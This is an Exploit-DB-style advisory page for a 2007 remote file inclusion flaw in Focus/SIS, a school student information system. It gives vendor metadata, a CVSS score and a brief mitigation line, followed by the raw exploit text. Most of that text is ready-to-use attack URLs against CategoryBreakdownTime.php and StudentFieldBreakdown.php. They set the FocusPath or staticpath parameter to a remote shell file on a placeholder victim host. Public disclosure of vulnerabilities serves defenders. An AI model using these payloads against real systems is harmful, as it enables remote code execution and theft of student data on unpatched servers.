Focus/SIS Remote File Inclusion

vendor:

Focus/SIS

by:

ThE TiGeR

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Focus/SIS

Affected Version From: 1

Affected Version To: 2.2

Patch Exists: NO

Related CWE:

CPE: a:focus-sis

Metasploit:

Other Scripts:

Platforms Tested:

2007

Focus/SIS Remote File Inclusion

This exploit allows an attacker to include arbitrary files from a remote server in the Focus/SIS application. The vulnerability exists in versions 1.0 and 2.2 of the application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Focus/SIS or apply the necessary security fixes provided by the vendor.

Source

Exploit-DB raw data:

#Focus/SIS =>1.0&2.2 Remote file inclusion

#Download v1.0 : http://unix.freshmeat.net/redir/focus_sis/64492/url_zip/Focus_v1.0.zip

#         v2.2 : http://www.focus-sis.org/download.php?modfunc=file&version=2.2
============================================================================================================
#Exploit V1.0 :

#http://victime.com/Focus_v1.0_path/modules/Discipline/CategoryBreakdownTime.php?FocusPath= shell.txt?
============================================================================================================
#Exploit v 2.2 :

#http://victime.com/Focus_v2.2_path/modules/Discipline/CategoryBreakdownTime.php?staticpath= shell.txt?

#http://victime.com/Focus_v2.2_path/modules/Discipline/StudentFieldBreakdown.php?staticpath=shell.txt?

#Greetz & Thx : Str0ke

#Discovered by ThE TiGeR 

# milw0rm.com [2007-09-08]